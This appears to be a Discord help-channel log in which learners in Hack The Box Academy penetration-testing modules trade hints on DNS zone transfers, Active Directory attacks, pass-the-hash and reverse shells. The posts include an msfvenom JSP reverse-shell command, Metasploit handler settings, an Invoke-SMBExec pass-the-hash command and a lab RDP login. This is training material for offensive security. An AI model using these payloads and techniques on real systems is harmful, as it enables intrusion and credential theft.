fathom pendant
heavy marsh
#

here's one example

fathom pendant
#

A being one level of subdomain, b being another etc

heavy marsh
#

I think my command is wrong, it's not finding any of these

fathom pendant
#

Try with dig axfr

fathom pendant
heavy marsh
#

I would but I'm in the active enumeration section

fathom pendant
#

You're expected to get failures on the ones you're not meant to access

heavy marsh
#

can you explain why it says this in the lesson, but there is no IP?

fathom pendant
#

And since its a public site the name server resolves through public dns

heavy marsh
#

So how would I normally do that?

fathom pendant
#

Also the nameserver wouldn't be root.inlanefreight.htb

heavy marsh
#

All they give in the first question is the domain

fathom pendant
#

Like there's a lot about dns that either you or the module glossed over

#

Yes

#

And from the domain you can find the nameserver

heavy marsh
#

Okay, so trial and error found it!

#

Thank you!

#

Sorry it just seemed weird to go through manually one by one

fathom pendant
heavy marsh
#

Still dont understand why there are only x zones.

#

Is there a hint you can give me without a spoiler?

fathom pendant
#

Is it lower than you thought?

heavy marsh
#

WAAYYYY lower!!!

#

I thought it was over a dozen

#

because of all the subdomains

#

there's nothing in the text of the outputs where I can clearly see "x" zones

#

I wish I could post spoilers

fathom pendant
#

SOA

trail leaf
#

tfw you spend 30 mins on a question only to realize you had it in the first 2 because of case sensitive answers pepehands

heavy marsh
#

SOA?

#

I don't see SOA in any of the outputs.

rugged veldt
#

For skill assessment part 2 in ad enum and attacks, how do I gain access to the DC as user CT*?

fathom pendant
heavy marsh
rugged veldt
#

I have winrm to MS01 as admin but not sure where to go from here

fathom pendant
trail leaf
fathom pendant
#

I mainly use dig, as nslookup is just painfully limited

heavy marsh
#

i tried: dig any inlanefreight.htb @<IP>

rugged veldt
#

o,o

heavy marsh
#

connection failed, timed out, host unreachable

#

do I have to remove /etc/hosts for this?

#

I'm so confused what is going on

#

Okay, found it with dig, had to respawn the machine, something was wrong.

fathom pendant
#

Nslookup, by its limitations though allows you to have specific queries without additional fluff

#

Dig is just superior at providing the more broad info

rugged veldt
fathom pendant
rugged veldt
#

I'm currently RDPed in MS01, followed the instructions of the hound

trail leaf
#

The hound tells all 🐕

#

right clicking the edge will give you abuse info

fathom pendant
rugged veldt
#

I've done the abuse info

#

Idk what I'm missing here

#

I'm so close

#

How do I decide which user to add to the domain admins

trail leaf
#

you could always make a new user and then add that user to domain admins

#

or just add yourself

rugged veldt
#

Exception calling add with 1 argument

#

Wtf.

#

I can't execute add domaingroupmember without an error

fathom pendant
tender yarrow
fathom pendant
#

Browsing available files will give you credentials

rugged veldt
#

Exact same way as stated

#

Hmmm

#

Power view is taking it as null though

fathom pendant
#

Are you in admin powershell?

rugged veldt
#

I'm running the powershell as admin

fathom pendant
#

Lol

rugged veldt
tender yarrow
fathom pendant
#

Just so I can properly guide you

rugged veldt
#

I've attempted adding another user, worked. Now just have to figure out how to access the DC now @wary plover

tender yarrow
tender yarrow
fathom pendant
#

From Attacking Common Services, yes?

tender yarrow
fathom pendant
#

Read the section carefully I believe it tells you what you need to know

#

I am checking my notes in a moment

tender yarrow
#

Sorry but Iv done that hence why I’m asking here

#

I’ll eat my words if the section notes explain it

fathom pendant
#

I haven't updated my notes for common Services

rugged veldt
#

YAY

#

I got it

#

Ty guys

#

Now just last question

fathom pendant
#

You have access to the sql server as the base user (not all databases, but that's not necessary)

tender yarrow
fathom pendant
#

I take donations

tender yarrow
#

Ok thanks

fathom pendant
#

Basically ctrl+f for those keywords and the module section will take it from there

#

I was told by staff I cannot charge for my assistance

#

But seriously don't

#

Anyway gl

pulsar prism
#

is it possible to reset a module? stepped away for a bit an want to restart

fathom pendant
#

And if you were taking decent or any notes: you'll be able to easily pick it up

#

Instances have their own lifetime that can be extended up to like 6 hours

#

But by default are only set to like 1-2

#

But when they die/you reset them any and all progress is lost

#

*unless progress was related to pwning a user

#

Otherwise that seems more of a question to message support for rather than randomly ask on discord

#

Yes answers are retained

#

And any pregenerated info

#

Like internal pivots

#

(Shells & payload module, skill assessment targets)

#

Otherwise some of it would be a pain in the ass to troubleshoot

#

Being able to narrow down the points of failure is important

#

User or htb (usually user)

sharp grail
#

Did you manage to solve it? I found that the cache changed, try looking trhrough the tmp again and use the other cacche keytab

fathom pendant
sharp grail
fathom pendant
#

Ah

#

Smb

fathom pendant
#

Just to keep you on your toes

sharp grail
tender yarrow
fathom pendant
#

Responder or the impacket smb one

sharp grail
#

Just realized i only copied part of the flag -.-

tender yarrow
fathom pendant
tender yarrow
#

Ah I think it’s the IP

fathom pendant
#

You should probably use your ip

#

X3

tender yarrow
#

Still the same! Jesus, I give up, thanks anyway 👍

fathom pendant
#

Your tun0 ip?

fathom pendant
#

Maybe it's not enabled

#

And you need to enable

sharp grail
#

For the "Pass the Ticket (PtT) from Linux" module, can anyone give me a hint with the last question "Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_). "

There is a keytab file under /etc/krb5.keytab i am guessing thats the keytab file for the machine and I have to impersonate that, but i am not sure how to use that :/

uneven dune
#

guys i have a question

#

but i wanna know why in this part

#

||works only when i called from /home/.., but if i called directly like sudo ./monitor.sh dont works||

proud pine
uneven dune
#

i am a little confuse

#

so when i ever user sudo this mean i use the root user to called, i am right ?

proud pine
#

Yes.

uneven dune
#

but

#

why i can use in my linux sudo in anywhere ?

#

i mean for example

#

if i try to run in my linux sudo monitor.sh works

#

but when i try to use that in the target dont works

proud pine
#

If the sudo privs were set up that way, you could. The way this is set up, they won't.

#
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh```
#

This is the only thing you are allowed to do with sudo, as your user.

uneven dune
#

ohh i understand now

#

so linEnum in this case

#

list all the files that can be run directly using all the path

#

i am right ?

proud pine
#

For the purposes of this module, yes.

uneven dune
#

in this cas NOPASSWD means not require password for that specific file

#

?

#

but if i try another file

proud pine
#

Yes, it means you can run sudo without password.

uneven dune
#

oh i understand now

#

thank you

proud pine
#

Cheers

rustic sage
fiery berry
#

you're given an IP:PORT, did you check what is running over it before jumping to port 445?

flint laurel
iron plaza
#

in the Password Attack Lab - Medium I found the|| zip file ||to crack by when I use ||zip2john ||to get the hash I get this massive wall of hash that seems way too big to be cracked. Am I doing something wrong?

flint laurel
#

@rustic sage hi I need help with skills assessment Part 2 getting on to dc01.

Would appreciate a nudge forward

fiery berry
vivid igloo
#

ayo

iron plaza
# fiery berry did you try to crack it anyway?

i did try with a wordlist or two and both failed the i just went with|| john zip.hash|| and my cpu went on an adventure ... the hash i got is like a page long as oppose to a line or so that we see in examples

vivid igloo
#

am not getting the reverse shell i've created payload :msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.61 LPORT=4444 -f war > runme.war
Payload size: 1105 bytes
Final size of war file: 1105 bytes

fiery berry
vivid igloo
#

but when i upload it to tomcat service it just dont give me session is it because there is some firewall rules ?

#

cont :The Live Engagement

iron plaza
vivid igloo
#

mod :SHELLS & PAYLOADS

fiery berry
vivid igloo
iron plaza
vivid igloo
#

┌──(kali㉿kali)-[~/Desktop]
└─$ nc -v -l -p 4444

#

the multi handlr >

#

?

#

on it

#

didn't worked

#

sf6 exploit(multi/handler) > set lhost 10.10.14.61
lhost => 10.10.14.61
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.61:4444

#

even tho in the tomccat the running status is true

#

yes

#

msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > options

#

through this :xfreerdp /v:10.129.163.142 /u:htb-student /p:HTB_@cademy_stdnt! /drive:/home/kali/Desktop
i grabed the payload from the local

narrow solar
#

hello friends, i am at AD Enumeration & Attacks - Skills Assessment Part I, to reach MS01 i tried having reverse shells from the webshell, all msf sessions are dying and netcat freezes , sometimes i can proxy and get rdp to MS01 but not more than 10 minuets then it freezes, i am trying for 3 days now but cant make any progress because of this, nothing is stable, is there any tips please

median dawn
#

Hi. I am currently stuck at Attacking Common Services Easy after obtaining the web shell. I am probably missing something obvious, but I am not able to pass commands that contain whitespace etc. URL encoding does not help. So that means I am stuck with one-word commands. What am i missing? 😦

proud pine
narrow solar
#

it is TCP, i will try to change it anyway

proud pine
pine dagger
narrow solar
#

yes i had this issue before and fixed it by changing to TCP, i will try to download it again and see what will happen

dusk torrent
fiery berry
median dawn
gaunt surge
#

Need help with Password Attacks/Credential Hunting in Linux module.
||I am ssh'd in as kira, i see the .mozilla directory, firefox_decrypt didn't work with newest version (python3.9+ required so i used an older one that works on the target. Running the older firefox_decrypt, it asks for for me master password. I tried a few passwords but can't get it... what am i missing? ||

pine dagger
fiery berry
gaunt surge
fiery berry
median dawn
gaunt surge
gaunt surge
#

Ah okay, thanks anyways 😄 maybe it will help!

gaunt surge
pine dagger
median dawn
frank moon
#

Hi
Is somebody to help me with this question ?

Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

https://academy.hackthebox.com/module/147/section/1638

#

im connecting with Julio hash in RDP, i make the command with MS01 hash to get a shell i launch a nc.exe -lvnp 8001, in another rdp i import invoke the hash and i launch the command Invoke-SMBExec -Target 10.129.25.219 -Domain inlanefreight.htb -Username julio -Hash JULIOHASH -Command "powershell -e base 64".

i get a rev shell on the netcat instance but i cant get c:/julio directory

tranquil axle
#

You want to pass the hash to dc01 not ms01, so your ip is wrong

#

And in your reverse shell you need to put the internal ip of ms01

#

I think you made ms01 connect to itself

frank moon
tranquil axle
#

Your payload uses 172.x.x.x too? And not 10.x.x.x?

frank moon
#

yep

tranquil axle
#

the command looks fine to me, you are making sure to run nc on the windows machine (ms01) and not your own attack box right?

frank moon
#

i make the command with rdp on julio user yes

frank moon
tranquil axle
pure patrol
#

How do you upload the file with RDP into windows machine ?
I juste do a copy/past and hasher don't work on windows powershell
Please help or hint me

barren apex
#

python upload server?

#

can download and upload files then

vital adder
#

use windapsearch

vital adder
pure patrol
vital adder
#

oh the windapsearch wasn't for you

pure patrol
vital adder
pure patrol
#

Thx a lot. It was easier toi got the flag with drive....
And thanks you for the link too!

civic zenith
mortal basin
cedar void
vital adder
#

i didn't but probably because it contain spoiler which it kinda does even if you didn't get the answer

dire sage
#

updating can solve the error of [-] Exploit failed: NoMethodError undefined method 'split' for nil:NilClass ?

#

in shells&payloads

#

skill assasment

#

yeah but it wont update

#

im updating it since 2 minutes ago and until now it is in 0%

iron plaza
dire sage
#

so anyone knows why my exploit (50064.rb) is giving me [-] Exploit failed: NoMethodError undefined method 'split' for nil:NilClass ?

#

im in host-2 in shells&payloads btw

cedar void
vital adder
cedar void
vital adder
#

just use --help instead of asking me 🤣

dire sage
vital adder
#

the issue in that post probably is because the guy use Host-2 ip for LHOST

tranquil axle
vital adder
# dire sage where's the LHOST setted?

really? probably the ip of the machine that you on 🤣 and if you are still wondering which ip on the machine then probably the one in the same network as the target

vital adder
cedar void
#

using the 'dump all' command doesn't give me much info either? when it prompt me for a password I just press enter

dire sage
#

wait a minute , the metasploit just crashed

vital adder
dire sage
tranquil axle
tranquil axle
#

try it

dire sage
tranquil axle
#

mb set vhost to just "blog.inlanefreight.local"

dire sage
#

thank you so much

dire sage
#

forget it , with the link it works too

tranquil axle
#

its for when the website is on a subdirectory like blog.inlanefreight.local/superblog/index.php or something, then you'd put "superblog" as targeturi

dire sage
#

ok ok

#

thanks for the explanation

dire sage
tranquil axle
#

you mean it was a optional parameter? its only optional if there is no vhost, so if the blog is on inlanefreight.local you don't need to specify it, but since its on blog.inlanefreight.local you need to point it to the vhost. Vhost is for when several websites are hosted on the same ip, if you dont specify the vhost but you target the url by ip the server wont know if you meant to browse to blog.inlanefreight.local, inlanefreight.local or somethingelse.inlanefreight.local

dire sage
tranquil axle
#

yes

dire sage
cedar void
vital adder
cedar void
vital adder
#

i have no note about that part plus the section have anonymous in the name so i think yea

rustic sage
#

guys, I'm doing Footprinting Lab-hard, do you have any idea where to start? Snmp doesn't seem to be on the right track

rustic sage
#

@fathom pendant I've tried everything, but nothing works

fathom pendant
#

Explain "everything" I'm sure the answer is in your output but you're ignoring it because you think it's incorrect

rustic sage
#

Like Thanos said: Fine, I'll do it myself.

fathom pendant
#

I'm literally trying to help you lol

#

And like I said it's probably in your output but you overlooked it

#

If you haven't gotten the public string

noble fiber
#

Guys, i'm doing the Web Attacks Module, Bypassing Basic Authentication topic. I'm trying to replicate the OPTIONS request to the lab, but in the Header response, i can't find any "Allow" field. Is this normal or am i doing something wrong? Command i used --> curl -i -X OPTIONS http://SERVER_IP:PORT/

fathom pendant
noble fiber
#

Thank you anyway

noble fiber
dire sage
#

in the host-3 in the shells&payloads i already have a ||aspx shell|| in the machine , but i cant acess the administrator folder , do i need to make prevlieges escalation or there's another way to get acess to the machine without being by a|| webshell||?

#

i thought maybe about ||ms17_010||

#

but it looks like it says exploit completed , but no session was created and it also says "Overwrite complete... SYSTEM session obtained

#

which i assume that im using the wrong payload when i try to exploit it via ||ms17_010||

fresh jay
#

i found these three pices of info for the machine im working on, could someone help guide me in choosing the correct payload when i exploit using metasploit? ||druid-core-0.17.1 ~ /root/druid/bin ~ netty-transport-native-epoll-4.1.42.Final-linux-x86_64||

#

should i set this? TARGETURI / yes The base path of Apache Druid

rigid hatch
#

👍👍

#

Op

spare isle
#

Hello,
does anyone experience problems with the connection to target in final skill assessment of brute forcing. When I input socket into the browser I get "Unable to connect" error message. 🙂

narrow solar
#

hey friends, is there a way to compile tools myself? i need chisel.exe

vital adder
vital adder
#

just use the releases one

spare isle
vital adder
#

oh i mean the name of the module that you are on

narrow solar
vital adder
#

the releases are precompiled you can just download and use the verion that you needed

supple patio
#

Just download the asset which you need

narrow solar
#

oh sorry its just i have to extract it 😂 thank you both

vital adder
#

so you are in Skills Assessment - service right?

#

for this after getting the cred like the question said you can login via ssh

vital adder
cyan ginkgo
#

can anyone help me with the
Introduction to Bash Scripting Conditional Execution

#

`#!/bin/bash

Variable to encode

var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}; do
var=$(echo -n "$var" | base64)
if [ $counter -eq 35 ]; then
echo -n "Number of characters in the 35th generated value of var: "
echo -n "$var" | wc -c
break # Stop the loop after the 35th iteration
fi
done`

#

i used this script but it gives me a anwser but htb says it wrong

cyan ginkgo
#

still gives me the wrong anwser

vital adder
#

also a tip for sending bash in discord is 3 ` on the top and top and bottom of your code and add bash next to the first 3 and you will get

echo 'test'
vital adder
#

at the end it's a 5 not a 4

acoustic owl
cyan ginkgo
#

# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}; do
  var=$(echo -n "$var" | base64)
  if [[ $counter -eq 35 ]]; then
    echo "Number of characters in the 35th generated value of var: "
    echo "$var" | wc -c
    break 
  fi
done
#

so iam using this now and i changed the -n and the double brackets

vital adder
#

oh sorry i mean try

var=$(echo "$var" | base64)
cyan ginkgo
#

yes thnx u

vital adder
spare isle
open ember
#

Hello. I have a question. I have Termux on my phone, could I use it to ssh into the target instead of using the pwnbox?

#

Or is that not an option

stray stratus
vital adder
vital adder
open ember
#

Got it. Sorry I'm fresh

#

Will do that right away

vital adder
#

@open ember Also if you have the pwnbox cred you can just login via ssh from anywhere

open ember
#

Ik but it doesn't seem to work from Termux

vital adder
open ember
#

Umm how do I verify my thing in here

stray stratus
sand cedar
vital adder